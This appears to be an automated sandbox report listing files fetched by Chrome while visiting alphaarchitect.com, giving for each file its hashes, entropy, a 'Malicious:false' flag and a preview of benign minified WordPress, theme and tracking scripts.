                                                                                                                                                                                                                                                                        Preview:/*! This file is auto-generated */.(()=>{"use strict";var t={d:(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})}},e={};t.r(e),t.d(e,{actions:()=>P,addAction:()=>A,addFilter:()=>m,applyFilters:()=>w,applyFiltersAsync:()=>I,createHooks:()=>h,currentAction:()=>x,currentFilter:()=>T,defaultHooks:()=>f,didAction:()=>j,didFilter:()=>z,doAction:()=>g,doActionAsync:()=>k,doingAction:()=>O,doingFilter:()=>S,filters:()=>Z,hasAction:()=>_,hasFilter:()=>v,removeAction:()=>p,removeAllActions:()=>F,removeAllFilters:()=>b,removeFilter:()=>y});const n=function(t){return"string"!=typeof t||""===t?(console.error("The namespace must be a non-empty string."),!1):!!/^[a-zA-Z][a-zA-Z0-9_.\-\/]*$/.test(t)||(console.error("The namespace can only conta
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):183
                                                                                                                                                                                                                                                                        Entropy (8bit):4.859497112954063
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:RAM8HpRBEBc2LGRFfMy2XRFXzYHHEszPAHjpduK/XRYACerJmMNrrOh:z8HpULkz2BpqzP4R+AKMM
                                                                                                                                                                                                                                                                        MD5:63035562092F9435822C0C4DF9BAB235
                                                                                                                                                                                                                                                                        SHA1:8B00B4DDEC44E93A5C114AF16C86DE19671D72B9
                                                                                                                                                                                                                                                                        SHA-256:4A8DF9D5CF4098E9C7E6C5F96480462F12CF89D1CF9F85E3363632F426B1B9B7
                                                                                                                                                                                                                                                                        SHA-512:80CEA57DD1E6E669FD917561D4B9B55B5D61F89EC274BF2DD0EB5B40DDE44366908338FDD5214C28FAE7748C0B444CE78843FC11758F648123109C2679F64796
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-button.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:jQuery(document).ready(function(){jQuery('.fusion-button[role="button"]').on("keydown",function(e){" "!==e.key&&"Enter"!==e.key||(e.preventDefault(),jQuery(this).trigger("click"))})})
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2894), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2894
                                                                                                                                                                                                                                                                        Entropy (8bit):4.953041397281386
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:kMxr0+y/36/SVu5kUQGly/3dkwkoaRrPhrmHHQGly/3KUEotKFhxglSk6Qci:7r0f/3egu5kUQGg/3dkFRrPNmHHQGg/R
                                                                                                                                                                                                                                                                        MD5:82EDBEEF0889BE30E779D94D96F37902
                                                                                                                                                                                                                                                                        SHA1:7192289B2C41D6CE1D8083F11BAFC653330A876B
                                                                                                                                                                                                                                                                        SHA-256:89903006BB131CF1B2C76D04187701664B0A2CFA8FBEDF1C66E653B13212F6C1
                                                                                                                                                                                                                                                                        SHA-512:2E5E9FD472A1CB338CCFADDB2FC2263A723C97264A442CD269B1D581ACE7867CFE474D8587574DE6AF9A7941DB24D0E2BE579FE5380F90740E84D783A72819A5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:jQuery(document).ready(function(){var t=jQuery(".um-account-main").attr("data-current_tab");t&&(jQuery('.um-account-tab[data-tab="'+t+'"]').show(),jQuery(".um-account-tab:not(:visible)").find("input, select, textarea").not(":disabled").addClass("um_account_inactive").prop("disabled",!0).attr("disabled",!0),wp.hooks.doAction("um_account_active_tab_inited",t)),jQuery(document.body).on("click",".um-account-side li a",function(t){t.preventDefault();var t=jQuery(this),t=(t.parents("ul").find("li a").removeClass("current"),t.addClass("current"),jQuery(this).attr("href")),a=jQuery(this).attr("data-tab");return jQuery('input[id="_um_account_tab"]:hidden').val(a),window.history.pushState("","",t),jQuery(".um-account-tab").hide(),jQuery('.um-account-tab[data-tab="'+a+'"]').fadeIn(),jQuery(".um-account-tab:visible").find("input, select, textarea").filter(".um_account_inactive:disabled").removeClass("um_account_inactive").prop("disabled",!1).attr("disabled",!1),jQuery(".um-account-tab:not(:visible
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (58876), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):58876
                                                                                                                                                                                                                                                                        Entropy (8bit):5.405683338218142
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:buY9NdAkLYPFvFkxF94zPnSJpSFDKNo5/H:buQdApFoF94zPnSJpSFDP5/H
                                                                                                                                                                                                                                                                        MD5:4328E910DE583AD53B3A7A76455AF005
                                                                                                                                                                                                                                                                        SHA1:E040010E5EF4121A3A163AACDC664D6AA4AFEC74
                                                                                                                                                                                                                                                                        SHA-256:D4963B8AFEBFA0063B5D17B4C80F49BCE702A37EA5C9B91BB3C996BB9DEA4B60
                                                                                                                                                                                                                                                                        SHA-512:F807BA8B0AE2D5387E93E292918EEB4D7D1AC7635566A38EE2E101FBE8A7C6C23E704770EFCB1401EB5D1385605CBFB15F0A840AC150770049D2A4D6CA9A0DFA
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://static.ads-twitter.com/uwt.js
                                                                                                                                                                                                                                                                        Preview:!function(){var t={6173:function(t,e,n){var r;t.exports=(r=r||function(t,e){var r;if("undefined"!=typeof window&&window.crypto&&(r=window.crypto),"undefined"!=typeof self&&self.crypto&&(r=self.crypto),"undefined"!=typeof globalThis&&globalThis.crypto&&(r=globalThis.crypto),!r&&"undefined"!=typeof window&&window.msCrypto&&(r=window.msCrypto),!r&&void 0!==n.g&&n.g.crypto&&(r=n.g.crypto),!r)try{r=n(2480)}catch(t){}var i=function(){if(r){if("function"==typeof r.getRandomValues)try{return r.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof r.randomBytes)try{return r.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")},o=Object.create||function(){function t(){}return function(e){var n;return t.prototype=e,n=new t,t.prototype=null,n}}(),a={},c=a.lib={},u=c.Base={extend:function(t){var e=o(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (6622), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):6622
                                                                                                                                                                                                                                                                        Entropy (8bit):5.142944161353103
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:8ilXxPl9IB4L/fd3PwAeIldhkgnqRqlfGrq9YI1u0+bRo9KhRpL2YCPM3QSaYG9t:8il2Q/f5Ze6XfCuP1um2b6YCPGaY6Zp
                                                                                                                                                                                                                                                                        MD5:8773E8F41220C9161EFB552033B74E87
                                                                                                                                                                                                                                                                        SHA1:F547AEB502B891985D484D977255754AAB7776BD
                                                                                                                                                                                                                                                                        SHA-256:1DCF137E7E60F08D5FD0A03F2EDDEBE0323A00EB682989C9B6DE248C9B0884B3
                                                                                                                                                                                                                                                                        SHA-512:7EE3E07868AA6F44A21C40475FE9D8C0BBA47E664EA3834A7B5BFCCAE1ADBCDBCDEC7285D8E9BD1309C9A1DE9325E99AA19E9FF6BBA52525901949B8775893CF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:function awbScrollToTarget(e,t){var n,o,s,i,a,r,l,u,c,h,f,d,p=jQuery("html").hasClass("ua-edge")||jQuery("html").hasClass("ua-safari-12")||jQuery("html").hasClass("ua-safari-11")||jQuery("html").hasClass("ua-safari-10")?"body":"html",g=jQuery(".fusion-tb-header").length,y=!1,m=!1;if(t=void 0!==t?t:0,e.length){if(e.parents(".fusion-scroll-section").hasClass("awb-swiper-full-sections"))return;if((e.parents(".hundred-percent-height-scrolling").length||e.find(".hundred-percent-height-scrolling").length)&&(0!=fusionScrollToAnchorVars.container_hundred_percent_height_mobile||!Modernizr.mq("only screen and (max-width: "+fusionScrollToAnchorVars.content_break_point+"px)"))){if((d=e.hasClass("fusion-scroll-section-element")?e:e.parents(".fusion-scroll-section-element")).hasClass("active")&&d.offset().top>=jQuery(window).scrollTop()&&d.offset().top<jQuery(window).scrollTop()+jQuery(window).height())return!1;if(location.hash&&"#_"===location.hash.substring(0,2)&&jQuery(".fusion-page-load-link").a
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (64131)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):79212
                                                                                                                                                                                                                                                                        Entropy (8bit):5.303052635488455
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:foPw7Fnru7/eGGG2nqwi83nORlJDRGookOlxNk7h2tKCBQOu7uq7dnnAjiEcEpWW:gs6knORYkOvOcE7JAvcch
                                                                                                                                                                                                                                                                        MD5:FCD7500D8E13D2B2AAE5D3956DC3E21D
                                                                                                                                                                                                                                                                        SHA1:AA40E683C82DD844DB73FDE37048CF7FC145135E
                                                                                                                                                                                                                                                                        SHA-256:5C6FDAB80CB86A279695DCCC226A1FAC50E2C922BEA70242EDAA28F52B7BAD2D
                                                                                                                                                                                                                                                                        SHA-512:65AB44D85B09E8F383F00C298239A1AE944B9B452DEA7E450889DFA4A1AEE11861B380D51FF5551B56B526F86F14F856BECF1537D1AFC005E0C09A3D3E2B5090
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/libs/select2/select2.full.min.js?ver=4.0.13
                                                                                                                                                                                                                                                                        Preview:/*! Select2 4.0.13 | https://github.com/select2/select2/blob/master/LICENSE.md */.!function(n){"function"==typeof define&&define.amd?define(["jquery"],n):"object"==typeof module&&module.exports?module.exports=function(e,t){return void 0===t&&(t="undefined"!=typeof window?require("jquery"):require("jquery")(e)),n(t),t}:n(jQuery)}(function(d){var e=function(){if(d&&d.fn&&d.fn.select2&&d.fn.select2.amd)var e=d.fn.select2.amd;var t,n,i,h,o,s,f,g,m,v,y,_,r,a,w,l;function b(e,t){return r.call(e,t)}function c(e,t){var n,i,r,o,s,a,l,c,u,d,p,h=t&&t.split("/"),f=y.map,g=f&&f["*"]||{};if(e){for(s=(e=e.split("/")).length-1,y.nodeIdCompat&&w.test(e[s])&&(e[s]=e[s].replace(w,"")),"."===e[0].charAt(0)&&h&&(e=h.slice(0,h.length-1).concat(e)),u=0;u<e.length;u++)if("."===(p=e[u]))e.splice(u,1),u-=1;else if(".."===p){if(0===u||1===u&&".."===e[2]||".."===e[u-1])continue;0<u&&(e.splice(u-1,2),u-=2)}e=e.join("/")}if((h||g)&&f){for(u=(n=e.split("/")).length;0<u;u-=1){if(i=n.slice(0,u).join("/"),h)for(d=h.len
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (388), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):388
                                                                                                                                                                                                                                                                        Entropy (8bit):4.746612465219723
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:z8Hp9G1sYTyRlaRgavuZZdMTzubYAAhERhTbYu1dGSbYAAhmM/fSBc:zAMmDaRgaGZZdMTzucERNcIGScmMoc
                                                                                                                                                                                                                                                                        MD5:7895A83A2E3717B4937CBEF999833AE0
                                                                                                                                                                                                                                                                        SHA1:EC9BDDB891515F20D705DD3276CAC39EE587AEDE
                                                                                                                                                                                                                                                                        SHA-256:3156AC3F8B5C61BF0E9DF9E452563B35CDB5FE9F0ABBDA56D672728FC7119540
                                                                                                                                                                                                                                                                        SHA-512:674B9AF4DB0E4312FA40A190D4C3C5045F9637711338F6FDEFB54E045F5B73BD00965D2650514681C7D54A60F5F54CE5C73F31969582D4C83F1C3E96C0CB655C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/js/um-gdpr.min.js?ver=2.9.1
                                                                                                                                                                                                                                                                        Preview:jQuery(document).on("click","a.um-toggle-gdpr",function(e){var e=jQuery(e.currentTarget),t=e.closest(".um-field-area"),g=t.find(".um-gdpr-content");g.is(":visible")?(t.find("a.um-toggle-gdpr").text(e.data("toggle-show")),g.hide().find("a.um-toggle-gdpr").remove(),e.length&&e.get(0).scrollIntoView()):(t.find("a.um-toggle-gdpr").text(e.data("toggle-hide")),g.show().prepend(e.clone()))});
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1393), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1393
                                                                                                                                                                                                                                                                        Entropy (8bit):4.986309365138596
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:zAMkzP11a0j1h37mEv0GXzP60ZR445OYq52so15RgvPXs1UkBRR4yXygBUehXLDr:kMaL37WwRJ4oso15WmRjC0h7DjZ6+
                                                                                                                                                                                                                                                                        MD5:089072481DD4B295480BAE64DE87A980
                                                                                                                                                                                                                                                                        SHA1:87F9B6C35D2FF97FB85C7E0FA22F63AE772484FD
                                                                                                                                                                                                                                                                        SHA-256:F9DD43A5DEEF56F854B83808ECE64062B5E8A97EDB2092949441D5930858C2A6
                                                                                                                                                                                                                                                                        SHA-512:7BA03031AFEC13CBAC8EFC634D81F99D0BACD1F78CE9CF6F5644A3CBF04E956AE84A558116E93F56BFF6055CF5D2D9AA24E6C72E2BB7570EFCECDA137ABF3BF7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/awb-vertical-menu-widget.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:jQuery(document).ready(function(){jQuery(".fusion-vertical-menu-widget .current_page_item, .fusion-vertical-menu-widget .current-menu-item").each(function(){var e=jQuery(this),n=e.parent();e.find(".children, .sub-menu").length&&e.find(".children, .sub-menu").show("slow"),e.parentsUntil(".fusion-vertical-menu-widget",".children, .sub-menu").show("slow"),n.hasClass("fusion-vertical-menu-widget")&&e.find("ul").show("slow")})}),jQuery(window).on("load",function(){jQuery(".fusion-vertical-menu-widget.click li a .arrow").on("click",function(e){var n=jQuery(this).parent(),i=n.parent(),t=i.find("> .children, > .sub-menu");if(e.preventDefault(),(i.hasClass("page_item_has_children")||i.hasClass("menu-item-has-children"))&&(t.length&&!t.is(":visible")?t.stop(!0,!0).slideDown("slow"):t.stop(!0,!0).slideUp("slow")),n.parent(".page_item_has_children.current_page_item, .menu-item-has-children.current-menu-item").length)return!1}),jQuery(".fusion-vertical-menu-widget.hover li").each(function(){var e;j
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (12175), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):12175
                                                                                                                                                                                                                                                                        Entropy (8bit):5.212777482235568
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:Tb48U1ckoIi1/XnGTzOy/CmW/aKOfgD+9Yb:n48U1YvGTKy/q/aKEgDP
                                                                                                                                                                                                                                                                        MD5:5AD2BA164F879FCBE172FF0D3BB2942A
                                                                                                                                                                                                                                                                        SHA1:AE4A19C4A5A0930366EF7CF263989027982DE627
                                                                                                                                                                                                                                                                        SHA-256:37ED90D7FD60A93CA259597140330BD62C8D303F50454FBA6C78824AA42BC0BF
                                                                                                                                                                                                                                                                        SHA-512:299861BF52FE125B4703D70B133205B3BD6840217757AE3E5E73DFDC49C464E6B682152FD53D462B44CC8A01617445CEDB58E8DCF0EDDFCCE93CF2E3FA0A6B7D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/js/um-functions.min.js?ver=2.9.1
                                                                                                                                                                                                                                                                        Preview:function UM_domenus(){jQuery(".um-dropdown").each(function(e,o){UM.dropdown.setPosition(o)})}function UM_check_password_matched(){jQuery(document).on("keyup","input[data-key=user_password],input[data-key=confirm_user_password]",function(e){var o=jQuery("input[data-key=user_password]").val(),a=jQuery("input[data-key=confirm_user_password]").val(),t=jQuery("input[data-key=user_password],input[data-key=confirm_user_password]");o||a?o!==a?t.removeClass("um-validate-matched").addClass("um-validate-not-matched"):t.removeClass("um-validate-not-matched").addClass("um-validate-matched"):t.removeClass("um-validate-matched").removeClass("um-validate-not-matched")})}function um_responsive(){jQuery(".um").each(function(){(element_width=jQuery(this).width())<=340?(jQuery(this).removeClass("uimob340"),jQuery(this).removeClass("uimob500"),jQuery(this).removeClass("uimob800"),jQuery(this).removeClass("uimob960"),jQuery(this).addClass("uimob340")):element_width<=500?(jQuery(this).removeClass("uimob340")
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 13264, version 331.-31261
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):13264
                                                                                                                                                                                                                                                                        Entropy (8bit):7.9869522851550885
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:o9YaYYXwStvE7PHv9wHOuUd1DEo/u1+V0:GfYYXztvEDgOuUrEomN
                                                                                                                                                                                                                                                                        MD5:8EB1B3E8681657092171B6AA809493C2
                                                                                                                                                                                                                                                                        SHA1:AA6CC2D47049BC05505D6EC1CD5237558B04D6E3
                                                                                                                                                                                                                                                                        SHA-256:65AE05CB1187B6EACDDCC464141AF208D9C172AEED20C74C3BF7663B530C5C0D
                                                                                                                                                                                                                                                                        SHA-512:18B89CD08824903D7B11DB5121089D195F6C79F420787B74488A673472993C7F7ADFFDC6979F6940C1CDFF2C05726CBDC54D39128654AED5D12327090523E7C0
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/themes/Avada/includes/lib/assets/fonts/fontawesome/webfonts/fa-regular-400.woff2
                                                                                                                                                                                                                                                                        Preview:wOF2......3...........3v.K......................?FFTM....`..Z.....\..".6.$..T..6.. ..[..+..iUG|......E...e..?Pc....P.5G..Aba.0...pE8.W..e...u.,..C..8..J.\....._.A'.~.U.V.3Z.dz..<...i....Y.g....#...b4'...M...h..'.,.6o..*...t.D".....n.?.{/pY..H....$@.4P..e8&....f*..3..S...^bm....k....{...ej..;./-..-...M..M..H..y.Lq*).t...?..a.7y.P...........Wko..{&...G:....'y$.>..~..$........Tm.....E..f...e.....0.uMi.`K..s.If.x..f.Rs....B..5,$-..F......O.w....J..m.!..^.a...p^.#....=..{sh.d.g..%hS........&...uV-.,.R.n/......[...K.__..,.BN.$...3..@...0.0.8m.`O...R...)v!....R[....9.).=.+v..0Mb.s...X.!zJ...J...w?.......j.G...a!..}...V{.F.?su...$!{.H..p........V.../.....2..#.w.G.......eN\qH..X.;.#P.H.`........|.....B...`8.. c.Qd...,...4.N'...'.8.....~..,O.J..1....:.v......}_....W*..r..%.jM.5....f...'...q7..}.....d..y;..Fwj.~.zn.q....c.?:.T...X..{f.v..k5.z.=Nv..2?.~..j..mM3.;...z....#..-_o...e..%...Y..a.......-.....9...[..C.n.2..j%.J.P.T#UG..x.g........;...}...!...&J.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (502), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):502
                                                                                                                                                                                                                                                                        Entropy (8bit):4.852813095123636
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:zAWrUzPHMxLvzg8TMjHvreKzZjzjHvL7B1kVMjHvpPLYK:zAWrUzPsxjzg8AjPrewZXjPL7bjPpZ
                                                                                                                                                                                                                                                                        MD5:41FB5898F76EB2B0C532F12502A8E104
                                                                                                                                                                                                                                                                        SHA1:282C0AA45DDC16B0A5FF8BF7405E2829CB13016E
                                                                                                                                                                                                                                                                        SHA-256:5FC6FD5AACBE2FD6EA1776496DADF4F8D9CED35317FC9BD335A9B72D6191398E
                                                                                                                                                                                                                                                                        SHA-512:19E3C8BA2D8708478AF21F3B0904C7A0B6469154409E68E554C6106E33A47F8BACC7B8EB57678EABC50BB171C018BA5E212D988FCD2B3FF42C811186873E43EE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:jQuery(document).on("ready fusion-widget-render-Fusion_Widget_Tabs",function(){jQuery(".fusion-tabs-widget .fusion-tabs-nav li a").on("click",function(n){var t=jQuery(this).data("link");n.preventDefault(),jQuery(this).parents(".fusion-tabs-nav").find("li").removeClass("active"),jQuery(this).parent().addClass("active"),jQuery(this).parents(".fusion-tabs-widget").find(".fusion-tab-content").hide(),jQuery(this).parents(".fusion-tabs-widget").find('.fusion-tab-content[data-name="'+t+'"]').fadeIn()})})
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (11569), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):11569
                                                                                                                                                                                                                                                                        Entropy (8bit):5.152502078570914
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:8HouCp34v17eGVAaB2CpZBJCCqCkR1mOW8OMGH5Z4I1V70xgY3X:2CGv17xX4CnBJUCf8OiI3Yn
                                                                                                                                                                                                                                                                        MD5:886C4C9015DF4FBED66A7F534F0C7F18
                                                                                                                                                                                                                                                                        SHA1:AF84CBD0D43E3674F22DEEC1A7D3F598E0D17F2B
                                                                                                                                                                                                                                                                        SHA-256:10120C1D412745CF45E72C094BD6FF7BB422F4E2B707701830867C4639D85DE3
                                                                                                                                                                                                                                                                        SHA-512:7EC96201B1284DCF2C8E8AA0144A898EC7FA7E914A9AC7EE018DC4B5C85D19E24D4736C5C89526317C48A3E9D0C7AE9B9E4908895129EEE7557851A2EB20E90C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:(()=>{"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t){return function(t){if(Array.isArray(t))return r(t)}(t)||function(t){if("undefined"!=typeof Symbol&&null!=t[Symbol.iterator]||null!=t["@@iterator"])return Array.from(t)}(t)||n(t)||function(){throw new TypeError("Invalid attempt to spread non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}()}function n(t,e){if(t){if("string"==typeof t)return r(t,e);var n={}.toString.call(t).slice(8,-1);return"Object"===n&&t.constructor&&(n=t.constructor.name),"Map"===n||"Set"===n?Array.from(t):"Arguments"===n||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n)?r(t,e):void 0}}function r(t,e){(null==e||e>t.length)&&(e=t.length);for(var n=0,r=Array(e);n<e;n++)r[n]=t[n];return r}function o(t,e
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2935)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):39974
                                                                                                                                                                                                                                                                        Entropy (8bit):5.309284464632211
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:iM2ueHru9BC39N3uCgopOO5opv6jdUtwHsyxJenCaLDt4yOcHAAyLprzekFK7Q/z:iEC391jqtwHsyxJenCaLx4RAyLprzeYZ
                                                                                                                                                                                                                                                                        MD5:F330CB00791D3D3D8196704F0E399EA1
                                                                                                                                                                                                                                                                        SHA1:CA48E93FB169ABEBE5B3242644F040A5798B193B
                                                                                                                                                                                                                                                                        SHA-256:0356FED73F077A7C1EC2A2B0AABA2330F07FBABFEE03DA2A6240A88843604322
                                                                                                                                                                                                                                                                        SHA-512:F00D5BD6069D81041645BCAF3A8C9C3B52BC37A4E54C2A32DD7EB34B825706B2D45EA9BD0DE06EA3714C7883B1A99BBCEC5D8FE0F6CAD0B9E8860566C7F1106D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/printfriendly.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:var commonUtils={hasClass:function(node,className){if(node.nodeType!==Node.ELEMENT_NODE){return!1}.if(node.classList){return node.classList.contains(className)}.var classNames=(node.getAttribute('class')||'').split(/\s/);return classNames.indexOf(className)>=0},addClassTo:function(node,className){if(node.nodeType!==Node.ELEMENT_NODE){return}.if(!commonUtils.hasClass(node,className)){if(node.classList){node.classList.add(className)}else{node.className=(node.className||'')+' '+className}}},removeClassFrom:function(node,className){if(node.nodeType!==Node.ELEMENT_NODE){return}.if(commonUtils.hasClass(node,className)){if(node.classList){node.classList.remove(className)}else{var classNames=(node.getAttribute('class')||'').split(' ');var index=classNames.indexOf(className);if(index>=0){classNames.splice(index,1)}.node.setAttribute('class',classNames.join(' '))}}},getImageWidth:function(img,onServer){if(img.jquery){img=img[0]}.var result=null;if(onServer){var pfDataWidth=img.getAttribute('pf-d
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (419), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):419
                                                                                                                                                                                                                                                                        Entropy (8bit):4.9486195188957245
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:AYFQMSaNIc0cKFyc/LCKBHxX3IdwSQbXkpc0cKCKBHyc/LFg+:4X4Ic0c8yc/lxxX2Oqc0c6xyc/pz
                                                                                                                                                                                                                                                                        MD5:B99AAAC784D5F3DE17720B9459BCC46E
                                                                                                                                                                                                                                                                        SHA1:83B5DD9B9231CBF69D21B1DFA18D177C47A3A80E
                                                                                                                                                                                                                                                                        SHA-256:590CCE61EDE54BF3DC5F827D505F0CEBCC2C6DCE9C7B43E014835D862F25FE04
                                                                                                                                                                                                                                                                        SHA-512:2014E07F26992A041D5FC7126C103951573D9A97B7A54701205DEC447E44949ED79A383B01C405751985A986E8DB2886F86D1F959CE44B80F719913E2B5F9377
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-general-global.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:function checkHoverTouchState(){var o,e=!1;document.addEventListener("touchstart",function(){clearTimeout(o),e=!0,jQuery("body").addClass("fusion-touch"),jQuery("body").removeClass("fusion-no-touch"),o=setTimeout(function(){e=!1},500)},{passive:!0}),document.addEventListener("mouseover",function(){e||(e=!1,jQuery("body").addClass("fusion-no-touch"),jQuery("body").removeClass("fusion-touch"))})}checkHoverTouchState()
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (412), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
